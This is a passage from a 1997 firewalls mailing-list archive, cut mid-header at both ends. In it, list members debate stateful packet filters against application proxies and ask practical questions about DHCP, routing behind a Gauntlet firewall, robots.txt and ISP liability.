by halon.sybase.com (8.8.4/8.8.4) with SMTP id KAA26975 for ; Mon, 9 Jun 1997 10:23:32 -0700 (PDT) Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896) id AA09380; Mon, 9 Jun 97 10:21:21 PDT Received: (from unixsvr1@localhost) by notesgw2.sybase.com (8.8.4/8.8.4) id KAA07563 for @sybgate.sybase.com:firewalls@GreatCircle.COM; Mon, 9 Jun 1997 10:20:11 -0700 (PDT) Message-Id: <199706091720.KAA07563@notesgw2.sybase.com> Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id 9C72B508231CABF6882564B1005F6632; Mon, 9 Jun 97 10:20:06 EDT To: "Craig I. Hagan" Cc: Ryan Russell/SYBASE , Darren Reed , sjg , firewalls From: Ryan Russell/SYBASE Date: 9 Jun 97 10:24:09 EDT Subject: Re: Stateful Packet Filters vs. Proxies X-Lotus-Type: Reply All Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk If you claim they are different because the are written differently, sure, I'll buy that. My claim was based on how they functioned, what happened to packets on the way through, and what level of security they provide. I should have clarified. My argument was based on how they appear to behave from the outside, black-boc style. Ryan ---------- Previous Message ---------- To: Ryan.Russell cc: avalon, sjg, firewalls From: hagan@cih.com ("Craig I. Hagan") @ smtp Date: 06/09/97 12:56:03 PM Subject: Re: Stateful Packet Filters vs. Proxies > my personal experience has been good. > > I disagree that a SPF != a proxy, at least not > entirely. you make an interesting argument. I will assert my belief that SPFs and proxies represent something akin to convergent evolution -- are bats special cases of birds, marsupial mice special cases of mice, etc? Admittedly, unlike evolution, we have a situation where people can learn from others' successes and failures. Things may look like ducks, quack like ducks, but if their DNA/source says "not a duck" it ain't a duck. Why do i believe that they are fundamentally different? SPFs are implemented as an adjunct the the IP stack of the machine -- basically it requires down and dirty OS level code in order to operate. Proxies don't. Merely because the SPF looks and acts like a dumb proxy doesn't make it a dumb proxy -- nor does it make dumb proxies special cases of SPF's. Now, an important adjunct: i'm merely addressing your assertion that SPFs and proxies belong to the same family of things, beit SPFs being special cases of proxies, or vice versa. I believe that the arguments over which is more secure are beyond the scope of this reply, and have more to with availability and easy of modifying the source code to both (i'd rather an SPF with rebuildable source than a proxy w/o it). Of course, there are many other factors to add into this equation, but, i'm digressing and risking flamage :) -- craig ------------------------------------------------------------------------------- Craig I. Hagan "It's a small world, but I wouldn't want to back it up" hagan@cih.com "True hackers don't die, their ttl expires" "It takes a village to raise an idiot, but an idiot can raze a village" From owner-firewalls-outgoing Mon Jun 9 10:40:26 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id KAA08015 for firewalls-outgoing; Mon, 9 Jun 1997 10:32:56 -0700 (PDT) Received: from eclipse.ncmi-gsl.com (postoffice.ncmi-ny.com [206.25.169.25]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id KAA07960 for ; Mon, 9 Jun 1997 10:32:43 -0700 (PDT) Received: from ny_nx_mail1.ncmi-gsl.com by eclipse.ncmi-gsl.com (8.7.5/8.7.3) with SMTP id NAA00650 for ; Mon, 9 Jun 1997 13:33:16 -0400 (EDT) Received: from cygni by ny_nx_mail1.ncmi-gsl.com (NX5.67f2/NX3.0M) id AA02251; Mon, 9 Jun 97 13:33:16 -0400 Message-Id: <9706091733.AA02251@ny_nx_mail1.ncmi-gsl.com> Received: by cygni.ncmi-ny.com (NX5.67f2/NX3.0X) id AA01220; Mon, 9 Jun 97 13:33:16 -0400 Content-Type: text/plain Mime-Version: 1.0 (NeXT Mail 3.3 v118.2) Received: by NeXT.Mailer (1.118.2) From: Donald Branch Date: Mon, 9 Jun 97 13:33:15 -0400 To: firewalls@GreatCircle.com Subject: DHCP and firewall1 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Has anyone configured firewall 1 to work with DHCP can someone tell me how they went about this issue. Donald Branch Unix sysAdmin NationsBanc P.S. Faith is finding answers in the heart From owner-firewalls-outgoing Mon Jun 9 10:41:03 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA28173 for firewalls-outgoing; Mon, 9 Jun 1997 09:30:30 -0700 (PDT) Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id JAA28152 for ; Mon, 9 Jun 1997 09:30:23 -0700 (PDT) Received: from smtp1.sybase.com (sybgate.sybase.com [130.214.220.35]) by halon.sybase.com (8.8.4/8.8.4) with SMTP id JAA20856 for ; Mon, 9 Jun 1997 09:34:35 -0700 (PDT) Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896) id AA00386; Mon, 9 Jun 97 09:32:24 PDT Received: (from unixsvr1@localhost) by notesgw2.sybase.com (8.8.4/8.8.4) id JAA03973 for @sybgate.sybase.com:firewalls@GreatCircle.COM; Mon, 9 Jun 1997 09:31:14 -0700 (PDT) Message-Id: <199706091631.JAA03973@notesgw2.sybase.com> Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id 35F8B5CBAC7B8D72882564B1005AD98B; Mon, 9 Jun 97 09:31:11 EDT To: Darren Reed Cc: hagan , sjg , firewalls From: Ryan Russell/SYBASE Date: 9 Jun 97 9:36:08 EDT Subject: Re: Stateful Packet Filters vs. Proxies X-Lotus-Type: Reply All Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm not sure how one would measure reliability, but my personal experience has been good. I disagree that a SPF != a proxy, at least not entirely. Check out: http://futon.sfsu.edu/~rrussell/spfvprox.htm I might also disagree that SPFs do not work universally well as proxys. You'd have to explain to me what you mean by that exactly... The only difficulty I've have with the SPFs I have used is with UDP, something that many proxys have difficulty as well. Ryan ---------- Previous Message ---------- To: hagan cc: Ryan.Russell, sjg, firewalls From: avalon@coombs.anu.edu.au (Darren Reed) @ smtp Date: 06/09/97 10:45:58 PM Subject: Re: Stateful Packet Filters vs. Proxies Add to this discussion that, to date, SPF's (and in-kernel proxies) have yet to be proven to be as reliable as real proxies. There have been cases emerge here in which the flaws in current implementations (of SPFs) became evident. FWIW, a SPF != a proxy And whilst "anything is possible", current SPF technology does not yet appear to have advanced far enough to allow them to work as universally well as proxies. Darren From owner-firewalls-outgoing Mon Jun 9 11:16:26 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id KAA08471 for firewalls-outgoing; Mon, 9 Jun 1997 10:35:14 -0700 (PDT) Received: from gate (MNA-cal-mcc-a-pvc253.econnect.net [204.50.214.50]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id KAA08366 for ; Mon, 9 Jun 1997 10:34:52 -0700 (PDT) Received: from a01fs002.nsci.net ([10.1.1.20]) by gate.mcc.net with ESMTP id <324834-1018>; Mon, 9 Jun 1997 11:35:36 -0600 Received: by A01FS002.mcc.net with Internet Mail Service (5.0.1457.3) id ; Mon, 9 Jun 1997 11:35:33 -0600 Message-ID: From: "Paquette, Trevor" To: "'John Kemker'" , firewalls@GreatCircle.COM Subject: RE: ISP Connection Date: Mon, 9 Jun 1997 11:35:32 -0600 X-Priority: 3 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.0.1457.3) Content-Type: text/plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I have no idea about what the clause actually covers.. I'm not a legal beagle, nor do I want to be. Having someone run your ISP services, I.E. firewall, is akin to having a security firm make deliveries for you. (OK this might be stretching it a bit..) Banks, rarely, if ever, make deliveries. They hire out a security company who jobs it is to make secure, reliable deliveries. Many banks (in Canada at least) use Brinks as an example. Brinks cannot 100% guarantee that no theft attempt will ever occur, but having them protect the banks money, sure does lessen the chance then if employee joe-schmoe did it himself. I am not saying that we can stop all break-ins through the firewall. (Anyone who does is lying to you, and you need to change Firewall administrators right away!) But by having a company that knows firewalls, one understands your needs and services, one that knows the threats that exist and remains current to the potential threats. That company has a much better chance of preventing break-ins then if you give it, as yet another, responsibility for an untrained employee. But hey.. you did it in house therefore it MUST be cheaper.. and more secure. (Not always.) > -----Original Message----- > From: John Kemker [SMTP:john.kemker@pfsfhq.com] > Sent: Monday, June 09, 1997 6:25 AM > To: firewalls@GreatCircle.COM > Subject: RE: ISP Connection > > I'm still curious about the indemnification clause. Lawyers like to > reduce > liability. It's their job. Insurance company lawyers like it even > more > than most. (Notice who I work for.) I would be very surprised if > your > insurance lawyers did not assist your corporate lawyers in crafting a > carefully worded set of clauses in your contracts limiting your > liability > (and, therefore, the amount they would have to pay on a claim) to the > very > least amount possible. > > This reminds me of the situation that occurred when they were building > the > Hancock building in Boston. The builder had specified a particular > size > glass, but the glass company had delivered a slightly smaller size > glass. > A particularly nasty wind cropped up and pulled huge sheets of glass > off > the building and blew them all over Boston. Hancock went to the > contractor, who in turn went to the subcontractor (the glass company). > They insisted on being recompensed for the damages. The glass company > filed a claim with their insurance company... > > ...John Hancock was their insurance company. > > Firewalls Moral: Be careful to know who is liable in case of a > problem. > It may be you. > > =========== REPLY PARTITION =========== > > On 06/06/97, at 05:15 PM, Paquette, Trevor wrote: > > >We have insurance for damage that may be caused by a break in. > >I don't know what type of insurance it is, but it is suppose to cover > >us in those situations. > > > > > >> However what I'm curious about is whether mcc.net is really > completely > >> "on > >> the hook" in this situation. BBN's SitePatrol, for example, comes > >> with an > >> extensive indemnification clause in its agreements ("if you're > broken > >> into, > >> we're not liable"). Are you saying that mcc.net doesn't have one > of > >> these > >> clauses in their agreements? > >> > > > John E. Kemker III > Systems Engineer, Primerica Financial Services > 3120 Breckinridge Blvd., Duluth, GA 30199 From owner-firewalls-outgoing Mon Jun 9 12:16:59 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA00839 for firewalls-outgoing; Mon, 9 Jun 1997 09:45:04 -0700 (PDT) Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id JAA00661 for ; Mon, 9 Jun 1997 09:44:33 -0700 (PDT) Received: from smtp1.sybase.com (sybgate.sybase.com [130.214.220.35]) by halon.sybase.com (8.8.4/8.8.4) with SMTP id JAA22412 for ; Mon, 9 Jun 1997 09:48:44 -0700 (PDT) Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896) id AA03070; Mon, 9 Jun 97 09:46:33 PDT Received: (from unixsvr1@localhost) by notesgw2.sybase.com (8.8.4/8.8.4) id JAA04938 for @sybgate.sybase.com:firewalls@GreatCircle.COM; Mon, 9 Jun 1997 09:45:23 -0700 (PDT) Message-Id: <199706091645.JAA04938@notesgw2.sybase.com> Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id CDD8AD1BCAAF60F9882564B1005C2FE9; Mon, 9 Jun 97 09:45:22 EDT To: Darren Reed Cc: firewalls From: Ryan Russell/SYBASE Date: 9 Jun 97 9:51:38 EDT Subject: Re: Stateful Packet Filters vs. Proxies X-Lotus-Type: Reply All Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The FTP port command thing was fixed, I don't know in what version. I don't know what you mean by not recreating the upper layers of data. The reason FTP requires special handling is because of the way FTP works, not TCP. All of TCP is not a special case, as FTP is. There are a whole bunch of applications that work as telnet-style TCP that one's SPF/proxy doesn't need to have a clue about unless you want to do some kind of filtering. Ryan ---------- Previous Message ---------- To: mike.jones cc: hagan, Ryan.Russell, sjg, firewalls From: avalon@coombs.anu.edu.au (Darren Reed) @ smtp Date: 06/10/97 12:31:41 AM Subject: Re: Stateful Packet Filters vs. Proxies In several reports, last year, it became apparent that Gauntlet (and I suspect the FWTK) would not work with FW1 because the "PORT" command was split over two packets (although this is now claimed to be fixed). The point being, FW1 doesn't try to recreate the upper layers of data properly, so anything which doesn't fit in one packet requiers them to provide "special case handling". What they (and consumers) don't seem to realise that all of TCP is a "special case". Consequently, thier entire suite of TCP proxies could be considered to be "flawed". If you're curious about "how", then look at the Linux FTP masquerade code - it too looks for everything in one packet (when I last looked). Darren From owner-firewalls-outgoing Mon Jun 9 12:26:00 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id MAA25873 for firewalls-outgoing; Mon, 9 Jun 1997 12:13:32 -0700 (PDT) Received: from columbia.digiweb.com (columbia.digiweb.com [206.161.225.22]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id MAA25864 for ; Mon, 9 Jun 1997 12:13:23 -0700 (PDT) Received: (from dyabolyk@localhost) by columbia.digiweb.com (8.8.5/8.8.5) id PAA17434; Mon, 9 Jun 1997 15:11:44 -0400 (EDT) Date: Mon, 9 Jun 1997 15:11:44 -0400 (EDT) From: Jonathan Tobin To: firewalls@GreatCircle.COM Subject: robots.txt Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk i am not sure if this is the appropriate place for this kind of inquiry, but I would like to know if anybody has info on how to set up a robots.txt file; as in, what are it's capabilities? --jonathan tobin www.dyabolyk.com From owner-firewalls-outgoing Mon Jun 9 12:39:30 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id MAA24775 for firewalls-outgoing; Mon, 9 Jun 1997 12:02:34 -0700 (PDT) Received: from newman (newman.unifiedtech.com [38.251.136.48]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id MAA24731 for ; Mon, 9 Jun 1997 12:02:16 -0700 (PDT) Received: from newman by newman (SMI-8.6/SMI-SVR4) id PAA11766; Mon, 9 Jun 1997 15:01:13 -0400 Message-ID: <339C52F9.2ADBE22F@unifiedtech.com> Date: Mon, 09 Jun 1997 15:01:13 -0400 From: Mike Jones Organization: Unified Technologies, Inc. X-Mailer: Mozilla 4.0b5C (X11; I; SunOS 5.5.1 sun4u) MIME-Version: 1.0 To: firewalls@GreatCircle.COM Subject: Re: Stateful Packet Filters vs. Proxies X-Priority: 3 (Normal) References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Craig Brozefsky wrote: > On Mon, 9 Jun 1997, Mike Ordun wrote: > > Have been following this discussion with a lot of interest as a > reseller > > of both SPF and proxy firewalls. I happen to believe that both are > > appropriate in different circumstances and customer need. > Nevertheless, I > > am a little troubled by the claims that SPFs are inherently > > insecure. Let me present a challenge. Lets compare some specific > > commercial offerings -- Firewall-1 in one corner representing SPF > and say > > Gauntlet, Raptor, or ANS in the other representing the proxy > approach. > > What I would like is some specific vulnerability that I cannot > protect > > myself from using the SPF as opposed to the proxy approach. Again > just > > for emphasis, I am interested in specific vulnerabilities not just > > restatement that in theory proxies are better because they deal with > the > > protocol at the application layer. My somewhat cynical hypothesis, > until > > proven wrong with specific example, is that the majority of proxies > are > > really not better and in fact may be no more than an disguised SPF > with > > address translation. > I gave an example earlier of smapd, and the capabilities it presents. Let me continue to be a contrarian and claim that mail, like other applications, should not necessarily be handled at all at the firewall. A firewall is first and foremost an access control device, and running an application (even a simple mail forwarder, like smap) is not an optimal use of the firewall. I feel much the same way about http proxying and filtering. > How about strong authentication at the firewall? Presenting a POP3 > interface that uses APOP? How about strong authentication? Firewall-1 has offered SecurID authentication for quite a while now. And I'd rather not have my firewall present a POP3 interface at all, thank you. APOP or no APOP, POP3 isn't exactly a model citizen as a protocol. > Specific vulnerabilities include buffer overflows in your MTA allowing > /bin/sh to be executed as that UID. How about the IMAP and POP3 holes > that were recently published. You could not have exploited these on a > application based IMAP or POP3 proxy. You could not exploit them on an SPF, either, since it wouldn't be running the MTA. This (to me) falls into the category of not neglecting security on internal systems just because you have a firewall in place. > Any buffer overlfow or other exploit that would involve the execution > of > /bin/sh(or other shell) via a overflow in a network accesable deamon > (let's say your POP3 or sendmail deamon) would be foiled by an > application level. This assumes that it is a true application level > proxy, like smapd for example from TIS. The reson for this is that > packets are not passed from the attacker to the victim via the > firewall, > rather the attacker has to interact with the firewall, and the > firewall, > then sends seeprate application level requests to the internal machine > to > perform the desired actions(assuming they fit wihtin the acceptable > range > of actions). Actually, I think you have it backward. We find ourselves in the enviable position of having most of our proxy-based firewalls written by good people who know what they're doing, thereby having a lot of good proxies (smap being a fine example) to use as examples. However, those proxies theoretically are prone to buffer overflow attacks in the same way as the service daemons they're protecting are. Since an SPF doesn't reassemble or interpret entire service requests, it's immune to (for example) a buffer overflow attack based on the way a particular SMTP command is interpreted. > One thing to consider when it comes to application level proxies, is > that > not all may perform the same level of 'proxying' as I described > above(generating their own application level requests within a > approved > range and then packaging the response to send to the original > requestor). Smapd does this on TIS, I am not sure if http-gw does. I'd say that a proxy that doesn't do that is hardly worth the name. -- Mike Jones Sr. Technology Advisor UNIFIED Technologies From owner-firewalls-outgoing Mon Jun 9 12:40:46 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id MAA25950 for firewalls-outgoing; Mon, 9 Jun 1997 12:14:48 -0700 (PDT) Received: from pse01.pios.com (PSE01.PIOS.COM [199.33.129.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id MAA25943 for ; Mon, 9 Jun 1997 12:14:40 -0700 (PDT) Received: by pse01.pios.com; (5.65v3.2/1.3/10May95) id AA16003; Mon, 9 Jun 1997 15:15:05 -0400 Received: from vaxd.PIOS.COM (vaxd.PIOS.COM) by gemini.pios.com (PMDF V5.0-6 #18985) id <01IJVG5SVWLC8WWKTS@gemini.pios.com> for firewalls@greatcircle.com; Mon, 09 Jun 1997 15:17:06 -0400 (EDT) Received: from cal_177.sanjose (192.168.14.7) by PIOS.PIOS.COM (PMDF V5.0-6 #18984) id <01IJVG3BBZDC8Y59LF@PIOS.PIOS.COM> for firewalls@greatcircle.com; Mon, 09 Jun 1997 15:15:06 -0400 (EDT) Date: Mon, 09 Jun 1997 12:19:20 -0700 From: Bill Stout Subject: Most common FW Linux? X-Sender: stoutb@vaxf.pios.com To: firewalls@greatcircle.com Message-Id: <2.2.32.19970609191920.0076df14@vaxf.pios.com> Mime-Version: 1.0 X-Mailer: Windows Eudora Pro Version 2.2 (32) Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7BIT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk What is the most common make of Linux used for firewalls? Redhat? If so, any technical reasons other than support? Bill Stout _____________________________________________________________________________ Bill Stout (Systems Engineer/Consultant) stoutb@pios.com Pioneer Standard (Computer Systems & Components) http://www.pios.com/ San Jose, CA (Location of 1 of 52 U.S. offices) (408) 954-9100 *My opinions do not reflect that of the company, and visa-versa, thankfully.* From owner-firewalls-outgoing Mon Jun 9 13:12:03 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA23364 for firewalls-outgoing; Mon, 9 Jun 1997 11:55:48 -0700 (PDT) Received: from ns2.emirates.net.ae (ns2.emirates.net.ae [194.170.1.40]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id LAA23290 for ; Mon, 9 Jun 1997 11:55:27 -0700 (PDT) Received: from hits-two ([194.170.24.32]) by ns2.emirates.net.ae (SMI-8.6/8.6) with SMTP id WAA22712; Mon, 9 Jun 1997 22:55:39 +0400 Message-Id: <3.0.1.32.19970609224754.0069e2fc@emirates.net.ae> X-Sender: forster@emirates.net.ae (Unverified) X-Mailer: Windows Eudora Pro Version 3.0.1 (32) Date: Mon, 09 Jun 1997 22:47:54 +0400 To: bsdi-users@bsdi.com From: Andrew & Terri Forster Subject: TCP/IP Addressing Problems with FireWall Cc: firewalls@greatcircle.com Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We purchased "gauntlet-type" proxy server firewall to complete our perimeter defences project including connection to the Internet. We are having problems of Internal clients being able to see (ping) the Firewall and for the BSDI FireWall box to ping internal machines across our internal router. I have prepared a rough diagram below then some explanations. I N T E R N E T | | _______|_______ | | | | Internet Router 194.bbb.ccc.1 s/net 255.255.255.0 |_______________| | | ___________|_____________________________ 194.bbb.ccc.* Network | | | _________|___________ Outside 194.bbb.ccc.9 s/net 255.255.255.0 | | Default Router 194.bbb.ccc.1 | Firewall | |_____________________| Inside 172.17.100.1 s/net 255.255.0.0 | | _______________|_________________________ 172.17.*.* Network (B Class) | | | ______|______ | | W95 Client | 172.17.30.13 B S/net | |_____________| Gateway 172.17.200.2 | | _________|_____________________ | 172.17.200.2 | | Cisco Router |____________________ 172.20.*.* | 172.16.200.2 | (B Class) |____________|__________________| | | ____________|____________________________ 172.16.*.* Network (B Class) | | _____|_______ | W95 Client | 172.16.30.11 (Gateway 172.16.200.2) |_____________| Note this is a test implementation of our final IP addressing Plan. Our registered IP C Class is used on the outside of the FireWall proxy server firewall 194.bbb.ccc.* and our inside of the Firewall we use a a 172.17.*.* B class network to our internal Router which also has other non-internet data feeds (eg 172.20.*.* above). On the inside of this internal router we are planning to use the IP address 172.16.*.* B Class network. Our problem is that clients on the 172.16.*.* network cannot ping (see) the firewall as its default router (gateway) is set as 194.bbb.ccc.1. Also the clients on the 172.17.*.* network can see the internal network only when the gateway is set as the 172.17.200.2 interface of the Router. Therefore it will not be able to see the Internet as all traffic is sent to the inside not the outside. The other external connections work fine as they all refer to their Internal Router port as their default router (gateway). Obviously I need to determine how to solve this so that the external traffic is directed to the Internet by the firewall and inside traffic correctly through the Router to the 172.16.*.* subnet. Any Assistance would be appreciated Thanks in Advance AMF ========================================================================== Andrew M Forster [GMT +4] Email: forster@emirates.net.ae Phone: +9712 262556 or +9712 453613 Fax: +9712 465344 ========================================================================== From owner-firewalls-outgoing Mon Jun 9 13:55:42 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA02544 for firewalls-outgoing; Mon, 9 Jun 1997 09:55:08 -0700 (PDT) Received: from cih-gw.cih.com (cih-gw.cih.com [204.69.206.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id JAA02505 for ; Mon, 9 Jun 1997 09:54:57 -0700 (PDT) Received: (from mail@localhost) by cih-gw.cih.com (8.7.6/8.6.9) id MAA21076; Mon, 9 Jun 1997 12:56:12 -0400 X-Authentication-Warning: cih-gw.cih.com: mail set sender to using -f Received: from cih-gw.cih.com(204.69.206.1) via SMTP by cih-gw.cih.com, id smtpd21074aaa; Mon Jun 9 16:56:03 1997 Date: Mon, 9 Jun 1997 12:56:03 -0400 (EDT) From: "Craig I. Hagan" Reply-To: hagan@cih.com To: Ryan Russell/SYBASE cc: Darren Reed , sjg , firewalls Subject: Re: Stateful Packet Filters vs. Proxies In-Reply-To: <199706091631.JAA03965@notesgw2.sybase.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > my personal experience has been good. > > I disagree that a SPF != a proxy, at least not > entirely. you make an interesting argument. I will assert my belief that SPFs and proxies represent something akin to convergent evolution -- are bats special cases of birds, marsupial mice special cases of mice, etc? Admittedly, unlike evolution, we have a situation where people can learn from others' successes and failures. Things may look like ducks, quack like ducks, but if their DNA/source says "not a duck" it ain't a duck. Why do i believe that they are fundamentally different? SPFs are implemented as an adjunct the the IP stack of the machine -- basically it requires down and dirty OS level code in order to operate. Proxies don't. Merely because the SPF looks and acts like a dumb proxy doesn't make it a dumb proxy -- nor does it make dumb proxies special cases of SPF's. Now, an important adjunct: i'm merely addressing your assertion that SPFs and proxies belong to the same family of things, beit SPFs being special cases of proxies, or vice versa. I believe that the arguments over which is more secure are beyond the scope of this reply, and have more to with availability and easy of modifying the source code to both (i'd rather an SPF with rebuildable source than a proxy w/o it). Of course, there are many other factors to add into this equation, but, i'm digressing and risking flamage :) -- craig ------------------------------------------------------------------------------- Craig I. Hagan "It's a small world, but I wouldn't want to back it up" hagan@cih.com "True hackers don't die, their ttl expires" "It takes a village to raise an idiot, but an idiot can raze a village" From owner-firewalls-outgoing Mon Jun 9 14:11:10 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA18956 for firewalls-outgoing; Mon, 9 Jun 1997 11:32:03 -0700 (PDT) Received: from grab (grab.coslabs.com [199.233.92.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id LAA18938 for ; Mon, 9 Jun 1997 11:31:56 -0700 (PDT) Received: from future.mulligan.com by grab (SMI-8.6/SMI-SVR4) id MAA16831; Mon, 9 Jun 1997 12:32:40 -0600 Received: from future by future.mulligan.com (SMI-8.6/SMI-SVR4) id MAA02438; Mon, 9 Jun 1997 12:32:37 -0600 Message-Id: <199706091832.MAA02438@future.mulligan.com> X-Mailer: exmh version 2.0gamma 1/27/96 To: "Kelly E. Gibbs" cc: Ryan Russell/SYBASE , Bill Stout , firewalls Subject: Re: Stateful Packet Filters vs. Proxies In-reply-to: Your message of "Fri, 06 Jun 1997 18:51:55 PDT." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Mon, 09 Jun 1997 12:32:37 -0600 From: Geoff Mulligan Sender: firewalls-owner@GreatCircle.COM Precedence: bulk kgibbs@best.com said: > At what level does the NAT occur in the OSI model? So far I've heard > 2 and 4... whats the right answer? NAT happens at the ip address level and requires modification to the IP and TCP/UDP headers. It may also require changes to the application data as in FTP when the IP address (or port) is embeded in the application data. geoff From owner-firewalls-outgoing Mon Jun 9 14:24:44 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id IAA13311 for firewalls-outgoing; Mon, 9 Jun 1997 08:08:44 -0700 (PDT) Received: from newman (newman.unifiedtech.com [38.251.136.48]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id IAA13303 for ; Mon, 9 Jun 1997 08:08:36 -0700 (PDT) Received: from newman by newman (SMI-8.6/SMI-SVR4) id LAA06103; Mon, 9 Jun 1997 11:07:26 -0400 Message-ID: <339C1C2E.F67342F@unifiedtech.com> Date: Mon, 09 Jun 1997 11:07:26 -0400 From: Mike Jones Organization: Unified Technologies, Inc. X-Mailer: Mozilla 4.0b5C (X11; I; SunOS 5.5.1 sun4u) MIME-Version: 1.0 To: Darren Reed CC: firewalls@GreatCircle.COM Subject: Re: Stateful Packet Filters vs. Proxies X-Priority: 3 (Normal) References: <199706091435.KAA04949@newman> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Darren Reed wrote: > In some mail from Mike Jones, sie said: > > Darren Reed wrote: > > > Add to this discussion that, to date, SPF's (and in-kernel > proxies) > > > have > > > yet to be proven to be as reliable as real proxies. There have > been > > > cases emerge here in which the flaws in current implementations > (of > > > SPFs) > > > became evident. > > Details, please? Which flaws? What cases? This is clearly the > > conventional wisdom, but details are very hard to come by. > > > > I'll admit right up front that I'm interested because we sell > > FW-1; if there are serious problems with the product, I want to > > know so I can stop recommending it to people. > In several reports, last year, it became apparent that Gauntlet (and > I suspect the FWTK) would not work with FW1 because the "PORT" command > was split over two packets (although this is now claimed to be fixed). I'm not entirely sure what you're trying to say here. Why would you want Gauntlet to work with FW1? Is it that someone behind a FW1 could not ftp to a server behind a Gauntlet? Be that as it may, this was a bug and it was fixed. It was *not* a security hole, in that it did not permit something that should have been denied. > The point being, FW1 doesn't try to recreate the upper layers of data > properly, so anything which doesn't fit in one packet requiers them to > provide "special case handling". What they (and consumers) don't seem > to > realise that all of TCP is a "special case". Consequently, thier > entire > suite of TCP proxies could be considered to be "flawed". > If you're curious about "how", then look at the Linux FTP masquerade > code - it too looks for everything in one packet (when I last looked). I don't follow you at all, I'm afraid. You're concluding that the entire product is flawed based on theoretically projecting one actual bug. I'm rather more interested in real security flaws. Your original message indicated multiple flaws and multiple cases pointing them out. This is a common claim, but whenever I've asked for details it always seems to turn into anecdotal evidence. I've always been a believer in the principle that the plural of "anecdote" is not "data", so I remain curious, but unconvinced. -- Mike Jones Sr. Technology Advisor UNIFIED Technologies From owner-firewalls-outgoing Mon Jun 9 15:12:38 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id NAA08368 for firewalls-outgoing; Mon, 9 Jun 1997 13:41:12 -0700 (PDT) Received: from bizet.videotron.net (bizet.videotron.net [205.151.222.75]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id NAA08128 for ; Mon, 9 Jun 1997 13:40:07 -0700 (PDT) Received: from vldejqqt (ppp096.216.msherb.videotron.net [207.96.216.96]) by bizet.videotron.net (8.8.5/8.8.2) with ESMTP id QAA04207 for ; Mon, 9 Jun 1997 16:40:41 -0400 (EDT) Message-Id: <199706092040.QAA04207@bizet.videotron.net> From: "Smoothy" To: Subject: Ethical problems... Date: Mon, 9 Jun 1997 16:44:01 -0400 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello, I'm presently looking to establish which confusions all the security mechanisms can involve in opposition with the ethics. If any ideas came to your mind...would u please send it to my email address : smoothy@videotron.ca. Example: lot of firewalls need to desencrypt a mail for checking viruses in, but it's directly in opposition of the confidentiality. Tx to all of u ! Stéphane Routhier Bombardier Inc. Division Sea-Doo/Ski-doo From owner-firewalls-outgoing Mon Jun 9 15:33:15 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA18703 for firewalls-outgoing; Mon, 9 